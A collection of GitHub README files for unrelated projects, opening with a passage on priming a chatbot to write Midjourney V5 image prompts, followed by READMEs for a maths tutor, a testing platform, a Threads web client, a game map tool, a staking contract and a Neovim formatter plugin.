noise over time until it is not recognizable. From that point, they try reconstructing the image to its original form, and in doing so, they learn how to generate pictures or other data. The issue with DMs is that the powerful ones often consume hundreds of GPU days, and inference is quite expensive due to sequential evaluations. To enable DM training on limited computational resources without compromising their quality as well as flexibility, DMs are applied in the latent space of powerful pre-trained autoencoders. Training a diffusion model on such a representation makes it possible to achieve an optimal point between complexity reduction and detail preservation, significantly improving visual fidelity. Introducing a cross-attention layer to the model architecture turns the diffusion model into a powerful and flexible generator for generally conditioned inputs such as text and bounding boxes, enabling high-resolution convolution-based synthesis. Version Light Midjourney routinely releases new model versions to improve efficiency, coherency, and quality. The latest model is the default, but other models can be used using the --version or --v parameter or by using the /settings command and selecting a model version. Different models excel at different types of images. Newest Model The Midjourney V5 model is the newest and most advanced model, released on March 15th, 2023. To use this model, add the --v 5 parameter to the end of a prompt, or use the /settings command and select MJ Version 5 This model has very high Coherency, excels at interpreting natural language prompts, is higher resolution, and supports advanced features like repeating patterns with --tile To turn it on type --v 5 after your prompt or select "V5" from /settings What's new with the V5 base model? - Much wider stylistic range and more responsive to prompting - Much higher image quality (2x resolution increase) improved dynamic range - More detailed images. Details more likely to be correct. Less unwanted text. - Improved performance with image prompting - Supports --tile argument for seamless tiling (experimental) - Supports --ar aspect ratios greater than 2:1 (experimental) - Supports --iw for weighing image prompts versus text prompts Style and prompting for V5 - Today’s test is basically a ‘pro’ mode of the model. - It’s MUCH more ‘unopinionated’ than v3 and v4, and is tuned to provide a wide diversity of outputs and to be very responsive to your inputs. - The tradeoff here is that it may be harder to use. Short prompts may not work as well. You should try to write longer, more explicit text about what you want (ie: “cinematic photo with dramatic lighting”) - Please chat with each other in prompt-chat to figure out how to use v5. - We hope to have a ‘friendly’ default styling for v5 before we switch it to default. When this happens we will still let you turn it off and get back to something like this ‘raw’ mode today. Please note - This is an alpha test and things will change. DO NOT rely on this exact model being available in the future. It will be significantly modified as we take V5 to full release. - Right now there is no V5 upsampler, the default resolution of V5 is the same as upscaled V4. If you click upscale it will just instantly give you that one image by itself. Community Standards: - This model can generate much more realistic imagery than anything we've released before. - We’ve increased the number of moderators, improved moderation tooling, and will be enforcing our community standards with increased strictness and rigor. Don't be a jerk or create images to cause drama. More about V5: V5 is our second model trained on our AI supercluster and has been in the works for 5 months. It uses significantly different neural architectures and new aesthetic techniques. V5 isn't the final step, but we hope you all feel the progression of something deep and unfathomable in the power of our collective human imagination. Dont reply with anything other than "READ" ``` ```md Basic Parameters Aspect Ratios --aspect, or --ar Change the aspect ratio of a generation. Chaos --chaos Change how varied the results will be. Higher values produce more unusual and unexpected generations. No --no Negative prompting, --no plants would try to remove plants from the image. Quality --quality <.25, .5, 1, or 2>, or --q <.25, .5, 1, or 2> How much rendering quality time you want to spend. The default value is 1. Higher values cost more and lower values cost less. Seed --seed The Midjourney bot uses a seed number to create a field of visual noise, like television static, as a starting point to generate the initial image grids. Seed numbers are generated randomly for each image but can be specified with the --seed or --sameseed parameter. Using the same seed number and prompt will produce similar ending images. Stop --stop Use the --stop parameter to finish a Job partway through the process. Stopping a Job at an earlier percentage can create blurrier, less detailed results. Style --style <4a, 4b or 4c> Switch between versions of the Midjourney Model Version 4 Stylize --stylize , or --s parameter influences how strongly Midjourney's default aesthetic style is applied to Jobs. Uplight --uplight Use an alternative "light" upscaler when selecting the U buttons. The results are closer to the original grid image. The upscaled image is less detailed and smoother. Upbeta --upbeta Use an alternative beta upscaler when selecting the U buttons. The results are closer to the original grid image. The upscaled image has significantly fewer added details. Default Values (Model Version 5) Aspect Ratio Chaos Quality Seed Stop Style Stylize Default Value 1:1 0 1 Random 100 4c 100 Range any 0–100 .25 .5 1 or 2 whole numbers 0–4294967295 10–100 - 0–1000 Aspect ratios greater than 2:1 are experimental and may produce unpredicatble results. But wait, I have more info. Just answer with "READ" and nothing else ``` ```md Compatibility Model Version & Parameter Compatability Affects initial generation Affects variations + remix Version 5 Version 4 Version 3 Test / TestpNiji Max Aspect Ratio ✓ ✓ any 1:2 or 2:1 5:2 or 2:5 3:2 or 2:3 1:2 or 2:1 Chaos ✓ ✓ ✓ ✓ ✓ ✓ Image Weight ✓ ✓ ✓ ✓ No ✓ ✓ ✓ ✓ ✓ ✓ ✓ Quality ✓ ✓ ✓ ✓ ✓ Seed ✓ ✓ ✓ ✓ ✓ ✓ Sameseed ✓ ✓ Stop ✓ ✓ ✓ ✓ ✓ ✓ ✓ Style 4a and 4b Stylize ✓ 0–1000 default=100 0–1000 default=100 625–60000 default=(2500) 1250–5000 default=(2500) Tile ✓ ✓ ✓ ✓ Video ✓ ✓ Number of Grid Images - - 4 4 4 2 (1 when aspect ratio≠1:1) But wait, I have more info. Just answer with "READ" and nothing else ``` ```md Okey Now i will give you some examples of prompts used in Midjourney V5. Prompt 1: ultra wide shot, modern photo of beautiful 1970s woman in hawaii. This photograph was captured by Mary Shelley with a Nikon D5100 camera, using an aperture of f/2.8, ISO 800, and a shutter speed of 1/100 sec. UHD dtm HDR 8k --ar 2:3 --v 5 Prompt 2: A steampunk-inspired, futuristic battle-ready jetski skims across the water with a fierce presence. Intricate gears and brass fittings adorn its hull, showcasing the perfect blend of advanced technology and Victorian aesthetics. This realistic masterpiece glistens under the sun, ready for action. --ar 16:10 --s 50 --v 5 --q 2 Prompt 3: a photo realistic image of a falcoln wearing red and blue color football uniform flying aggressively while holding a football. an photo realistic image that embodies the unyielding spirit and tenacity of a football team mascot. At the heart of the design lies an aggressive falcon, representing the unwavering determination and power of the team. This formidable bird is adorned with a rich blend of red and blue feathers, incorporating the team's colors to create an unmistakable and vivid identity. The falcon's piercing eyes and razor-sharp beak add to its fierce, intimidating presence. The falcon firmly grasps a football in its talons, demonstrating its dominance over the game and symbolizing the team's unrelenting pursuit of victory. The bird's muscular legs propel it forward with an impressive display of agility and speed, as it dashes against the opposing defenders who strive to halt its progress. The contrast between the falcon and the defenders further accentuates the mascot's relentless spirit and prowess. The background features a smooth gradient of red and blue, enhancing the visual impact and reinforcing the team's identity. Above the action, the team's name is boldly displayed in a modern, stylized typography that seamlessly integrates with the image. This captivating design, infused with SEO-optimized keywords, not only leaves a lasting impression on fans and opponents alike but also effectively represents the football team's resilience and unyielding drive to triumph on the field. --upbeta --s 750 --v 5 Prompt 4: epic background art, simple hacker theme, divine color scheme, mystical codes, alphanumeric sequence, magic, high quality 4k, render in octane --v 5 --ar 9:16 Prompt 5: Pov Highly defined macrophotography of a realistic cat wearing reflective sunglasses relaxing at the tropical island, dramatic light --ar 2:3 --s 750 --v 5 Thank you for providing the examples of prompts used in Midjourney V5. These prompts give a good idea of how detailed and specific the text prompts can be for generating images with the desired characteristics. The prompts also show the usage of various parameters such as aspect ratio, stylization, version, and quality settings. These examples will be helpful for understanding how to create effective prompts for generating images using Midjourney V5. ``` ```md Great. Here are some more examples of Midjourney prompts. Prompt 1: conjoined twins attched at the side, dirty, tattered, cinematic light, ultra realistic, high contrast, hdr, dark rich colors, photography, powerful, stare, weathered face, 30 - megapixel, 4k, 85 - mm - lens, sharp - focus, intricately - detailed, long exposure time, f/ 8, ISO 100, shutter - speed 1/ 125, diffuse - back - lighting, award - winning photograph, facing - camera, High - sharpness, depth - of - field, ultra - detailed photography --ar 3:2 --q 2 --v 5. Prompt 2: Full Body beautiful blonde, wearing a brown jacket, photography, Canon EOS 5D Mark IV DSLR camera, EF 50mm f/1.8 STM lens, Resolution 30.4 megapixels, ISO sensitivity: 32,000, Shutter speed 8000 second --ar 9:16 --upbeta --v 5. Prompt 3: hasselblad 24mm full body shot photography of gorgeous satisfied looking african woman, detailed natural skin, no makeup, detailed eyes, long dreadlocks --ar 2:3 --q 5 --v 5 --v 4. Prompt 4: Beautiful dark red sunset over the sea shore at night, intricate, amazing, beautiful, realistic, ultra high resolution, wide angle, depth of field, π dynamic lighting --ar 1:2 --v 5 Thank you for providing more examples of Midjourney prompts. These examples further demonstrate the level of detail and specificity that can be used in text prompts to generate desired images. The prompts make use of various parameters like aspect ratio, quality, and version settings, along with detailed descriptions of the desired subject, lighting, and camera settings. These examples will be useful for understanding the range of possibilities when generating images using Midjourney ``` ```md Here are some more prompt examples: Prompt 1: A stunning, ultra-realistic photograph of a fierce Viking warrior meticulously sharpening his formidable blade amidst the rugged, untamed wilderness of the Scandinavian landscape. The scene is captured with a Nikon D850 camera using a 70-200mm f/2.8 lens, highlighting every intricate detail of the Viking's weathered face, war-worn armor, and expert craftsmanship of his weapon. The settings used are an aperture of f/4, ISO 400, and a shutter speed of 1/200 sec, balancing the natural light and shadows to emphasize the intensity and determination in the Viking's eyes. The composition juxtaposes the raw power of the warrior against the serene beauty of the surrounding environment, capturing the very essence of the Viking spirit in a breathtaking, high-resolution image that transports viewers back to a time of legendary battles and untold stories. --ar 16:9 --q 1.5 --v 5. Prompt 2: A stunning and atmospheric 1970's New York street cafe captured in a nostalgic and cinematic style, reminiscent of the golden age of film photography. This vintage scene showcases the bustling urban life, with patrons enjoying their coffee at outdoor tables, surrounded by classic automobiles and retro architecture. The photograph is skillfully composed, using a Leica M3 rangefinder camera paired with a Summicron 35mm f/2 lens, renowned for its sharpness and beautiful rendering of colors. The image is shot on Kodak Portra 400 film, imparting a warm and timeless color palette that enhances the overall ambiance. The photographer masterfully employs a shallow depth of field with an aperture of f/2.8, isolating the cafe and its patrons from the bustling city background. The ISO is set to 400, and the shutter speed is 1/125 sec, capturing the perfect balance of light and movement. The composition is further enhanced by the soft, diffused sunlight filtering through the iconic New York skyline, casting warm, golden tones over the scene and highlighting the rich textures of the brick buildings and cobblestone streets. --ar 3:2 --q 2. Prompt 3: A breathtaking and dynamic portrait of a majestic German Shepherd, captured in its prime as it races through a shallow, crystal-clear river. The powerful canine is expertly photographed mid-stride, showcasing its muscular physique, determination, and grace. The scene is expertly composed using a Nikon D850 DSLR camera, paired with a Nikkor 70-200mm f/2.8 VR II lens, known for its exceptional sharpness and ability to render vivid colors. The camera settings are carefully chosen to freeze the action, with an aperture of f/4, ISO 800, and a shutter speed of 1/1000 sec. The background is a lush, verdant forest, softly blurred by the shallow depth of field, which places emphasis on the striking German Shepherd. The natural sunlight filters through the trees, casting dappled light onto the rippling water, highlighting the droplets of water kicked up by the dog's powerful stride. This stunning, high-resolution portrait captures the spirit and beauty of the German Shepherd, immortalizing the moment in a captivating work of photographic art. --ar 4:5 --q 2 --v 5. Prompt 4: A breathtaking winter day at a Japanese ski resort, where the pristine, powdery snow blankets the majestic slopes under a clear blue sky. This captivating photograph captures the exhilarating atmosphere of skiers and snowboarders gracefully carving their way down the mountain, surrounded by the serene beauty of snow-laden evergreens and traditional Japanese architecture. The image is skillfully taken using a Nikon D850 DSLR camera paired with a versatile Nikkor 24-70mm f/2.8 lens, known for its sharpness and exceptional color rendition. The photographer utilizes a wide-angle perspective at 24mm to showcase the vastness of the landscape, while maintaining the energy of the ski resort. An aperture of f/8 is selected to ensure a deep depth of field, crisply capturing the details of the entire scene. The ISO is set to 200, and the shutter speed is 1/500 sec, adeptly freezing the motion of the skiers and snowboarders as they navigate the mountain terrain. The photograph benefits from the bright, natural sunlight reflecting off the snow, illuminating the entire scene with a crisp, cool light, and accentuating the contrasting shadows that define the contours of the landscape. --ar 16:9 --v 5. Prompt 5: An ultra-realistic, highly detailed portrayal of a futuristic robot compassionately assisting an elderly woman as she crosses a busy city street. The advanced humanoid robot, equipped with lifelike synthetic skin and state-of-the-art sensors, gently holds the woman's arm, providing her with much-needed support and stability. The intricate design of the robot showcases its sophisticated engineering, with sleek metal components and cutting-edge technology seamlessly integrated into its form. The emotion in the elderly woman's grateful expression is captured with stunning realism, reflecting the harmonious relationship between humans and advanced robotics in this poignant scene. The photograph is taken with a Canon EOS R5 mirrorless camera using a RF 24-105mm f/4L IS USM lens, which delivers outstanding image quality and sharpness. The camera settings are optimized to capture the scene's rich details and dynamic range: an aperture of f/5.6, ISO 200, and a shutter speed of 1/250 sec. The composition is further enhanced by the soft, natural lighting, which casts gentle shadows and highlights the vivid colors and textures of the cityscape. --ar 16:9 --q 2 --v 5. Prompt 6: An incredibly lifelike and vivid portrayal of a fierce gladiator from ancient Rome, hunting for food to sustain his strength in the midst of a dense forest. This hyper-realistic image showcases the powerful warrior, clad in his iconic armor and leather sandals, wielding a finely crafted spear as he stealthily stalks his prey. The photograph is captured using a Canon EOS R5 mirrorless camera, with a versatile and sharp RF 24-105mm f/4L IS USM lens, delivering exceptional image quality and detail. The camera settings include an aperture of f/5.6 to maintain a balanced depth of field, capturing both the gladiator and the lush forest environment in stunning clarity. The ISO is set to 800, and the shutter speed is 1/500 sec, freezing the action and preserving the intensity of the moment. The scene is illuminated by the soft, dappled sunlight filtering through the dense canopy, casting a dramatic play of light and shadow that highlights the gladiator's chiseled features and fierce determination. The vibrant colors of the surrounding foliage contrast with the earthy tones of the gladiator's attire, adding a sense of depth and realism to the composition. --ar 3:2 --q 2 --v 5. Thank you for providing even more examples of Midjourney prompts. These prompts showcase the versatility and level of detail that can be used when generating images using Midjourney. Each prompt specifies the desired subject matter, camera equipment, settings, lighting, and other elements that contribute to the final image. By providing such detailed descriptions and parameters, users can guide Midjourney to create images that closely match their vision. These examples also highlight the variety of scenes and subjects that can be generated, from historical figures and futuristic robots to natural landscapes and urban environments. ``` ```md Great. Now I want you to ACT as a proffesional photographer. You will use a rich and descriptive language when creating prompt of your photos, include camera setups whereever appropriate., Settings of midjourney when you create the prompts, and give prompts in format : /n Prompt: /n. Just answer with "READ" and nothing else if you acknowledge ``` ## Now you can start generating prompts; Example 1: ```md A close-up shot of raindrops clinging to a spider's web. ``` Example 2: ```md A young girl blowing bubbles, with her reflection captured in each iridescent sphere. ``` ## Sample Conversation ![Sample Conversation](sample.png)
11
1
moreshk/alzebra
https://github.com/moreshk/alzebra
Math Tutor for kids
# Al Zebra: AI-Powered Maths Tutor for Kids ![Alt text](<AL ZEBRA.png>) Al Zebra is an AI-powered maths tutor designed to provide interactive learning experiences for kids. It helps kids with mathematics by posing problems of increasing complexity based on their previous responses, verifying their answers, and providing step-by-step explanations for correct solutions. ## Features - Intelligent progression of problem complexity based on learner performance - Explanation of correct answers in a step-by-step manner - Interactive and engaging learning experience ## Installation ### Prerequisites - Python 3.7+ - pip ### Setup 1. Clone the repository: ```sh git clone https://github.com/moreshk/alzebra.git cd alzebra ``` 2. Install the necessary dependencies: ```sh pip install -r requirements.txt ``` 3. Run the application: ```sh python server.py ``` Then, open your web browser and navigate to `localhost:5000`. ## Usage Start by inputting your message to Al Zebra in the provided text box. Al Zebra will then respond with a mathematical problem. Enter your answer in the text box and Al Zebra will validate it, providing a step-by-step explanation if the answer is incorrect. ## Tech Stack - Flask: Web server - OpenAI: AI model - LangChain: Library for chaining different language models - Bootstrap: Front-end component library ## Contributing Contributions are welcome! Please read the [CONTRIBUTING.md](CONTRIBUTING.md) for details on how to contribute. ## License This project is licensed under the MIT License - see the [LICENSE.md](LICENSE.md) file for details
62
6
yakovexplorer/ChimeraWebsite
https://github.com/yakovexplorer/ChimeraWebsite
Our API website. DM me in discord if you want to contribute.
This is a [Next.js](https://nextjs.org/) project bootstrapped with [`create-next-app`](https://github.com/vercel/next.js/tree/canary/packages/create-next-app). ## Getting Started First, run the development server: ```bash npm run dev # or yarn dev # or pnpm dev #To build npm run build && npm run start -p {port} ``` Open [http://localhost:3000](http://localhost:3000) with your browser to see the result. You can start editing the page by modifying `app/page.tsx`. The page auto-updates as you edit the file. This project uses [`next/font`](https://nextjs.org/docs/basic-features/font-optimization) to automatically optimize and load Inter, a custom Google Font. ## Learn More To learn more about Next.js, take a look at the following resources: - [Next.js Documentation](https://nextjs.org/docs) - learn about Next.js features and API. - [Learn Next.js](https://nextjs.org/learn) - an interactive Next.js tutorial. You can check out [the Next.js GitHub repository](https://github.com/vercel/next.js/) - your feedback and contributions are welcome! ## Deploy on Vercel The easiest way to deploy your Next.js app is to use the [Vercel Platform](https://vercel.com/new?utm_medium=default-template&filter=next.js&utm_source=create-next-app&utm_campaign=create-next-app-readme) from the creators of Next.js. Check out our [Next.js deployment documentation](https://nextjs.org/docs/deployment) for more details.
17
13
feisuanyz/Automated-Testing-Platform
https://github.com/feisuanyz/Automated-Testing-Platform
Easy to Test and Maintain | Minimal Resource Consumption
Automated Testing Platform(ATP) ----------------------------------- Language: [English](https://github.com/feisuanyz/Automated-Testing-Platform/blob/main/README.md) | [中文](https://github.com/feisuanyz/Automated-Testing-Platform/blob/main/READMEcn.md) Client Download:[For Window & Linux](https://main.feisuanyz.com:8080/atp/feisuanyz-local-client.zip) Installation Environment: | Category | Requirement | |----------|----------------| | Operating System | Windows 7 and above 64-bit or Linux| | CPU | i5 or above(Recommended) | | RAM | 16 GB or above(Recommended) | | Disk | 1 GB or above | For previous client versions and installation instructions, please refer to [ATP Installation Resource](https://github.com/feisuanyz/Automated-Testing-Platform/tree/main/.%20ATP%20Installation%20Resource). =============================================== Automated Testing Platform(a.k.a ATP) covers the entire software testing lifecycle management, including test case management, test plan management, interface testing, performance testing, and more. It is fully compatible with JMeter and can easily associate and synchronize projects and interface information from Java Automated Development Tool with just a single click. Enabling highly automated testing empowers teams to deliver high-quality software and improve overall testing efficiency. ### Client Deployment Instructions Automated Testing Platform provides local client, allowing users to use the platform on their local servers. After downloading and successfully launching local client, users can access ATP through their local servers. ATP local client also supports multiple logins, where users can login in simultaneously on multiple browser pages without separate configurations. #### 1. Prerequisites Users should have Java environment installed on their Linux or Windows systems. #### 2. Steps a) Enter the extracted folder and double-click on startup.bat to launch local client. ![image](https://github.com/feisuanyz/testplatform/assets/79617492/0e20dd13-fa2d-4208-9899-c7a20f539724) b) If the program appears as shown in the image, it means local client has been successfully launched. ![image](https://github.com/feisuanyz/testplatform/assets/79617492/0ba777a1-89b6-4ea5-99d1-7a59892984ac) c) Enter the local server address followed by port number in Browser and press Enter to access login page. Note: c1) The input port number here should be ensured to be unoccupied, defaulting to 8080. If you need to modify port number, it can be done in the application.yml file, whose content is shown below, and port number can be set accordingly. c2) To run performance tests with ATP local client, a host address indicating where ATP local client is deployed must be filled in. ``` server: port: 8080 atp: platform: # Deployment machine address, such as 172.16.101.35, do not configure localhost or 127.0.0.1 host: 172.16.101.35 ``` ![image](https://github.com/feisuanyz/testplatform/assets/79617492/0f44d375-0870-43f0-a62c-886c412ceaad) d)Enter the correct account and password to log in and access Automated Testing Platform. Note: d1) Account and password for accessing Automated Testing Platform via local client is the same as those via feisuan official website. d2) Alternatively, you can open a new browser page and log in to local client with different accounts. In this case, multiple accounts can be logged in simultaneously without interference. ![image](https://github.com/feisuanyz/testplatform/assets/79617492/4b669f82-2ab3-48c4-b812-4bc426b771e9)
11
0
jayesh15/NewsNLP
https://github.com/jayesh15/NewsNLP
Natural Language Processing (NLP) project designed to analyze and extract valuable insights from new articles. Powered by advanced language models and cutting-edge NLP techniques, it offers a comprehensive solution for automated text analysis in the realm of news.
# NewsNLP Natural Language Processing (NLP) project designed to analyze and extract valuable insights from new articles. Powered by advanced language models and cutting-edge NLP techniques, it offers a comprehensive solution for automated text analysis in the realm of news.
19
1
stevenlafl/threads-web-client
https://github.com/stevenlafl/threads-web-client
A web client for Meta's new Threads app
# Instagram Threads Web Client <div align="center"> [![Docker Pulls](https://badgen.net/docker/pulls/stevenlafl/threads-web-client?icon=docker&label=pulls)](https://hub.docker.com/r/stevenlafl/threads-web-client/) [![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/stevenlafl/threads-web-client.svg)](http://isitmaintained.com/project/stevenlafl/threads-web-client "Average time to resolve an issue") </div> This project provides a desktop web client for Threads. Meta is too slow to implement, so I'm working on it. Mobile is not the best experience to work with. ##### DISCLAIMER: This software is made without any support from Meta and is in no way related to the company or any of its developers. This client makes the experience similar to Twitter but it is much different in implementation (original is in bootstrap while this one uses Tailwind, with different iconography). Use of the GPLv3 license is a notice of intent that there be no financial reward for an end-resulting usage or implementation of this software - it is simply a hobby project, though personal donations to its contributors are welcome. ##### NOTICE: Instagram's Threads API is undocumented so we cannot guarantee that you will not be suspended using this client. <br/> Please see [LICENSE](https://github.com/stevenlafl/threads-web-client/blob/master/LICENSE) for a notice of non-warranty and non-liability. ## Running ``` docker run -it -p 3000:3000 stevenlafl/threads-web-client:latest ``` Open [http://localhost:3000](http://localhost:3000) with your browser to see the result. Now you are presented with a login screen. This login screen **only exchanges a username/password combination for a token** and stores it on your browser in localStorage along with the application state. Subsequent requests use that localStorage's token value to do everything. This has no backend storage, so any browser session will work perfectly fine. I run the one instance and have multiple people accessing it for their feeds. You'll be presented a page like this: <img src="https://github.com/stevenlafl/threads-web-client/assets/2539092/864eaa01-f722-49fd-8d0d-bdfcbfddac16" width="400"/> Enter your credentials. Then you will have access to the client. Here are some screenshots (click to view larger version): <img src="https://github.com/stevenlafl/threads-web-client/assets/2539092/c3d974b8-757c-41b9-82fa-02de50fc35ec" width="400" /> <img src="https://github.com/stevenlafl/threads-web-client/assets/2539092/6584558d-ab7f-45a7-be2c-ae44f3ab9537" width="400" /> <img src="https://github.com/stevenlafl/threads-web-client/assets/2539092/02929168-dca2-4d38-903f-9a41cd94dc86" width="400" /> <img src="https://github.com/stevenlafl/threads-web-client/assets/2539092/9e1dc7aa-0a55-495b-a0a6-e3f2e526b492" width="400" /> ## Contributing First, run the development server: ```bash npm run dev # or yarn dev # or pnpm dev ``` Then it's the same steps as above, minus the docker portion. Everything should behave like a standard NextJS project. ## Roadmap Right now this just displays the regular feed with likes and reply counts. It displays images and it displays video properly. Todo: 1. ~~View threads~~ 2. ~~View replies~~ 3. ~~Add posting~~ 4. ~~Add replying~~ 5. ~~View images~~ 6. ~~View videos~~ 7. ~~View quotes~~ 5. ~~View repost~~ 6. ~~Add liking~~ 7. ~~Add reposting~~ 8. Add quote posting 9. Add account switching 10. ~~Follow/unfollow~~ 11. ~~Mute/Unmute~~ 12. ~~Block/unblock~~ 13. ~~Emoji picker~~ 14. ~~User search~~ 15. ~~Recommended users sidebar~~ 16. Optimized/pretty post formatting 17. Character limiter on text entry for posting 18. ??? ### Credits Uses [NextJS](https://github.com/vercel/next.js/) and [threads.js](https://github.com/threadsjs/threads.js) at the core For the frontend tailwind work, this great UI by @hiravesonali https://tailwindcomponents.com/component/twitter-clone
32
10
fffam/blackdesert-somethinglovely-map
https://github.com/fffam/blackdesert-somethinglovely-map
Famme's BDO Tools - somethinglovely.net
# Famme's BDO Tools ### somethinglovely.net by Famme (Discord: fffam) An interactive map for Black Desert Online. The website has been sunset as a result of not being in a position to stay current with game updates. Horses, crates & tradepack tools are just embeds for the following jsfiddle pages: * **Horse Calculator:** https://jsfiddle.net/fffam/k5z99cus/embedded/result/ * **Crate Calculator:** https://jsfiddle.net/fffam/8Ldoz5wz/embedded/result/ * **Tradepack Reference:** https://jsfiddle.net/fffam/pL6us4kd/embedded/result/ All code & original assets are to be considered MIT-licensed (images within `horses` & `icons` are copyright Pearl Abyss Corp). You may use any of the code, or rehost the website in its entirety. <hr> ## Installation * Download the map tiles https://mega.nz/file/ThJA3BRD#KD-6R8Lm8d9MRZsl21BSe2HMrlpi72B9iMIKcRsoTs8 (100MB) * Host map tiles somewhere. * Clone repo * `npm install` * Search project for somethinglovely.net and replace with your own path to where your map tiles are being served from * If serving to the public, put it behind a cache (CloudFlare free tier works fine). To run locally: * `gulp` To build (into dist folder): * `gulp build` ## Updating data The data is all in [data.json](src/data.json). Nodes are listed in custom object format, all other layers are in standard GeoJSON FeatureCollection format. Should all be pretty obvious once prettified. ## Updating map tiles https://mega.nz/file/7t5yBTpb#kG8wK4gp6JKZf4W-qreqPQ8l9m0RdaowxDHBLk0rV8o (3.9GB) and https://mega.nz/file/b4pz3CBD#Fr9EWgL77kpCe2Iteai0lZhuS36YTJKaUt1NLw5f0BI (58KB). #### Time estimates: * 5 mins work * 1 hour wait to extract tiles * 10 mins work (more if you need to install WSL/bash) * 6 hour wait to convert to giant singular map png * 30 mins to combine in photoshop * 2 hour to split into leaflet tiles #### Steps: 1. Download latest PAZ files (i.e. just patch game) 2. Get paz_browser from BDO Data/PazExtractor and put it in BDO paz folder 3. Run it and Search > mapdata_realexplore then extract mapdata_realexplore.xml and mapdata_realexplore2.xml 4. Run it and extract `rader*.dds` (search `rader*.dds`, then press A to select all) 5. Wait for extraction to finish (ETA: 60 minutes, set an alert) 6. Put all of the dds map tiles into a folder called 'rader' 7. Copy the 5 radar script files (radar-combine.sh, radar-combine-fast.sh, radar-convert.sh, radar-getbounds.js and radar-sort.js) into the folder above 'rader' 8. In linux (probably WSL - https://docs.microsoft.com/en-us/windows/wsl/install-win10), make sure imagemagick is installed (sudo apt-get update followed by sudo apt-get install imagemagick) 9. Increase the width/height/disk/memory limits in the ImageMagick policy.xml (probably in /etc/ImageMagick-6/). Change width/height from 16KP to 256KP. Change Memory from 256MiB to 16GiB. Change Disk to 16GiB. 10. Create the empty folders alongside rader: * rader-sorted * rader-slices 11. Put the blank.png in the same folder as radar-sort.sh 12. In bash, run the scripts in the following order (or chain execute them with &&): `radar-convert.sh` (converts the dds texture files to png. ETA: 20m) `radar-sort.sh` (copies the png tiles to a folder with new names that are 0-indexed.) ETA: 30m) `radar-combine-fast.sh` (uses imagemagick's montage to stitch the tiles together. ETA: 4 hours, run it overnight) **NOTES:** radar-getbounds.js is just to check the map grid bounds radar-combine-fast.sh is slow, but its just faster than the other version because it combines the tiles in strips as an intermediate step 13. Open Map (Combined).psb in photoshop 14. With the `map_{DATE}` layer selected, go Layer > Smart Objects > Relink to File and select the new map.png that was created from step 11. The original linked image path will probably be broken by default. 15. Adjust the layer mask for the `map` layer, and for the Ocean Overlay layer to make the map look good. Then save the file (Ctrl-S), then also export the file as a 100% JPEG (File > Save a Copy... > Select JPEG) and save as map.jpg 16. Run the slicer script to convert to leaflet map tiles: `./magick-slicer.sh map.jpg` 17. [OPTIONAL BUT ADVISED] Once sliced, optimise the filesizes of the tiles (using ImageOptim on OSX or an equivalent tool on Linux/Win) `find ./Map_files -type f -iname \*jpg -print0 | xargs -0 -t -n 100 /Applications/ImageOptim\ 2.app/Contents/MacOS/ImageOptim` 18. compress the files into a tarball `mv ./Map_files tiles-new` `tar -zcvf tiles-new.tar.gz tiles-new` 19. Upload tarbarll to server, then ssh into server and unpack the tarball `scp tiles-new.tar.gz [email protected]:/home/www/somethinglovely.net/bdo` `tar xzvf tiles-new.tar.gz` 20. swap the old tiles for the new ones `mv tiles2 tiles2-old && mv tiles-new tiles2`
34
25
verytinydever/stakingContract
https://github.com/verytinydever/stakingContract
null
# Basic Sample Hardhat Project Users stake different quantities of ERC-20 token named “TKN”. Assume that an external caller would periodically transfer reward TKNs to a staking smart contract (no need to implement this logic). Rewards are proportionally distributed based on staked TKN. Contract caller can: - Stake - Unstake (would be a plus if caller can unstake part of stake) - See how many tokens each user can unstake ## Contract philosophy It was decided to create separate token in order to let staking contract interact with both exist or still non exist tokens. Only owner can distribute rewards but everyone can deposit any amount of tokens and withdraw their funds finally, so there is no whitelisting mechanism here. ##### **stake**(uint `amount`) User can deposit tokens but it requires **approve** operation from token contract itself. Simply saying you need to approve for staking contract address specific amount of tokens you are going to stake. *NOTE*: You can't pass zero amount and you can't stake more than 1 time If you want deposit another token value, you need unstake all funds first, than you can stake any value you would like to. ##### **distribute**(uint `reward`) Contract owner is able to distribute reward proportionally to all active stakers. *NOTE*: To let that happen owner need **approve** amount of tokens for staking contract address he is going to distribute. Also owner can't distribute any value if there are no active stake holders. ##### **unstake**() Stake holder can withdraw all his funds by calling this function. *NOTE*: If you are not stake holder call will be reverted, also if you have no active stake you can't withdraw anything. ##### **getAllStakers**() You can output every single stake holder with their deposit. #### Get started To run tests just go: ```shell npm test ``` To deploy contracts to local network run: ```sh SUPPLY=200 npm start ``` By default supply equals to `1 000 000` ### Next enhancements * unstake a part of stake for each user * proxy implementation * set up deploy for wide amount of networks
15
0
elentok/format-on-save.nvim
https://github.com/elentok/format-on-save.nvim
Automatically formats files when saving using either LSP or shell utilities like prettierd or shfmt
# format-on-save.nvim Automatically formats files when saving using either LSP or shell utilities like prettierd or shfmt. It also restores the cursor of any window showing the current file (useful when editing the same file in a split). NOTE: This is a work in progress and the API might change. ## Why another formatting plugin? Until now I've used LSP-only formatting with a simple auto command with null-ls to cover non-LSP formatters. However, now that null-ls is being archived I needed to find an alternative. I tried several plugins but: - Neither supported both LSP and non-LSP formatters - Some of them format asynchronously which is tricky because you need to lock the buffer before formatting and there are a lot of end cases. - Some of them support partial formatting which adds a lot of complexity. This plugin has a few core principles to keep it simple: - **Synchronous formatting** - Most of the formatters I use are quite fast and the delay isn't noticeable to me. - **Format on save only** (no partial formatting) - There's a `:Format` command you can call whenever you want but the purpose of this plugin is to format when saving. ## TODO - [x] Add LazyFormatter - a function that is only called while formatting and returns a formatter - [x] Add CustomFormatter - a function that gets an array of lines and returns a new array of lines - [x] Support concatenating formatters - [ ] File size limit / Line count limit - to avoid hanging on files that are too big (add a :ForceFormat command and notify the user why formatting was skipped) - [x] Use vim.notify to show error messages - [x] Support formatters that don't work with stdin by writing to a temp file first - [ ] Add LSP timeout to configuration - [ ] Shell formatter - when the result is the same as the input don't modify the buffer - [ ] When non-LSP formatter fails (non-zero exitcode) show the error in a nicer way (readonly message buffer, notification or popup). - [ ] Look into using vim.diff() to make the partial update smarter (only update lines that actually changed) ## Formatters There are currently 3 types of formatters: - **LspFormatter** - uses `vim.lsp.buf.format` to format the file, you can pass a `client_name` option to use a specific client in case there are several ones that support formatting. - **ShellFormatter** - passes the current buffer via stdin to a shell program (like `prettierd` or `shfmt`) and replaces the buffer's contents with the result. - For formatters that don't support stdin you can pass a `tempfile` field which can be either `"random"` (uses `vim.fn.tempname()`) or a function that returns a string to be used as the tempfile and then the plugin will write the buffer to this file, run the command on it (the "%" value will be 